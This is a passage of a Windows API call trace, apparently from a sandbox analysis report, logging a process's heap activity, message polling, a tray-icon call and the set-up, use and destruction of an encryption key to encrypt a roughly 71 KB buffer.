(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0043.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.838] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.839] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.839] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.841] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.841] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.841] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.841] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.841] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.841] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.841] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.841] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.841] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.841] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0043.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.841] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.841] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.841] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.842] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.842] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.842] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.842] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.842] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.842] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.842] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 1 [0043.843] TranslateMessage (lpMsg=0x6ae1d4) returned 0 [0043.843] DispatchMessageW (lpMsg=0x6ae1d4) returned 0x0 [0043.843] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ad870) returned 1 [0043.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0043.844] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0043.844] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0043.844] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.845] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x118e5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x118f0) returned 1 [0043.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.845] CharLowerBuffW (in: lpsz="byte[71921]", cchLength=0xb | out: lpsz="byte[71921]") returned 0xb [0043.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.846] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.846] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.846] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9581e8*, pdwDataLen=0x6ae220*=0x118e5, dwBufLen=0x118f0 | out: pbData=0x9581e8*, pdwDataLen=0x6ae220*=0x118f0) returned 1 [0043.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.847] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.847] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.847] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.848] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.848] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.848] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.848] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.848] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.848] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.848] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.855] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.855] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.855] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.857] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.857] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.857] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.857] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.857] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.857] CryptDestroyKey (hKey=0x7c2200) returned 1 [0043.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.857] RtlAllocateHeap (HeapHandle=0x770000, 